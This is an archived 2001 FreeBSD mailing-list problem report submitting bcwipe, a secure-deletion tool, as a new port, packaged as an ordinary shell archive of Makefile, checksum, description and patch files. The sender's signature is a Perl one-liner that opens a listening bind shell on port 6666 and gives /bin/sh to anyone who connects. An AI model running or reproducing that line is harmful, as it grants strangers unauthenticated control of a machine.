Skip site navigation (1)Skip section navigation (2)
Date:      Sat, 9 Jun 2001 22:12:07 +0200 (CEST)
From:      Tamas Foldi <crow@kapu.hu>
To:        FreeBSD-gnats-submit@freebsd.org
Subject:   ports/27993: New Ports: bcwip
Message-ID:  <Pine.LNX.4.10.10106092203330.30464-100000@mail.kapu.hu>

next in thread | raw e-mail | index | archive | help

>Number:         27993
>Category:       ports
>Synopsis:       New Ports: bcwip
>Confidential:   no
>Severity:       non-critical
>Priority:       low
>Responsible:    freebsd-ports
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          change-request
>Submitter-Id:   current-users
>Arrival-Date:   Sat Jun 09 13:20:01 PDT 2001
>Closed-Date:
>Last-Modified:
>Originator:     Crow
>Release:        FreeBSD 4.2-RELEASE i386
>Organization:
>Environment:
>Description:

This PR overrides PR 27917.

new port description:

       bcwipe - securely erase data from magnetic and solid-state 
       memory.

       bcwipe Repeatedly overwrites special patterns to the files
       to be destroyed.  In normal mode, 34 patterns are used (of
       which 8 are random).  These patterns were  recommended  in
       article  from Peter Gutmann
       (http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html)
       entitled  "Secure  Deletion  of  Data  from   Magnetic and
       Solid-State Memory".  In quick mode,  U.S.  DoD(Department
       of  Defence) 5200.28 standard are used with 7 pass wiping.
       In custom mode U.S. DoD 5200.28  standard  are  used  with
       user defined number of passes.

>How-To-Repeat:
>Fix:

# This is a shell archive.  Save it in a file, remove anything before
# this line, and then unpack it by entering "sh file".  Note, it may
# create directories; files and directories will be owned by you and
# have default permissions.
#
# This archive contains:
#
#       .
#       ./Makefile
#       ./distinfo
#       ./pkg-comment
#       ./pkg-descr
#       ./pkg-plist
#       ./files
#       ./files/patch-aa
#
echo c - .
mkdir -p . > /dev/null 2>&1
echo x - ./Makefile
sed 's/^X//' >./Makefile << 'END-of-./Makefile'
X# New ports collection makefile for:   bcwipe
X# Date created:                                Mar 4, 2001
X# Whom:                                        crow
X#
X# $FreeBSD$
X#
X
XPORTNAME=      bcwipe
XPORTVERSION=   0.2
XPORTREVISION=  2
XCATEGORIES=    security
XMASTER_SITES=  http://www.jetico.com/linux/
XDISTNAME=      BCWipe-${PORTVERSION}-${PORTREVISION}
X
XMAINTAINER=    crow@nektor.hu
X
XWRKSRC=         ${WRKDIR}/${PORTNAME}-${PORTVERSION}-${PORTREVISION}
X
XMAN1=          bcwipe.1
X
X.include <bsd.port.mk>
END-of-./Makefile
echo x - ./distinfo
sed 's/^X//' >./distinfo << 'END-of-./distinfo'
XMD5 (BCWipe-0.2-2.tar.gz) = dd5c345a1e79ed30009126fa4b035bd2
END-of-./distinfo
echo x - ./pkg-comment
sed 's/^X//' >./pkg-comment << 'END-of-./pkg-comment'
XBCWipe securely erase data from magnetic and solid-state memory
END-of-./pkg-comment
echo x - ./pkg-descr
sed 's/^X//' >./pkg-descr << 'END-of-./pkg-descr'
Xbcwipe Repeatedly overwrites special patterns to the files
Xto be destroyed.  In normal mode, 34 patterns are used (of
Xwhich 8 are random).
XWWW: http://www.jetico.com
END-of-./pkg-descr
echo x - ./pkg-plist
sed 's/^X//' >./pkg-plist << 'END-of-./pkg-plist'
Xbin/bcwipe
END-of-./pkg-plist
echo c - ./files
mkdir -p ./files > /dev/null 2>&1
echo x - ./files/patch-aa
sed 's/^X//' >./files/patch-aa << 'END-of-./files/patch-aa'
X--- Makefile.orig      Thu Dec  7 19:04:06 2000
X+++ Makefile   Sun Dec 31 15:22:09 2000
X13c13
X< root=/
X---
X> PREFIX=/usr/local
X22,23c22,23
X<      $(INSTALL) -m 644 bcwipe.1      $(root)/usr/man/man1/
X<      $(INSTALL) -o root -m 755 -s bcwipe   $(root)/usr/bin/
X---
X>      $(INSTALL) -m 644 bcwipe.1      $(PREFIX)/man/man1/
X>      $(INSTALL) -o root -m 755 -s bcwipe   $(PREFIX)/bin/
END-of-./files/patch-aa
exit
---End of bcwipe.shar---

Best regards,
Foldi Tamas

--
perl -MIO::Socket -e'$s=IO::Socket::INET->new(LocalPort=>6666,Listen=>8);$c=
$s->accept;$n=$c->fileno;open STDIN,"<&$n";open STDOUT,"<&$n";exec"/bin/sh -i"'


>Release-Note:
>Audit-Trail:
>Unformatted:

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-ports" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.LNX.4.10.10106092203330.30464-100000>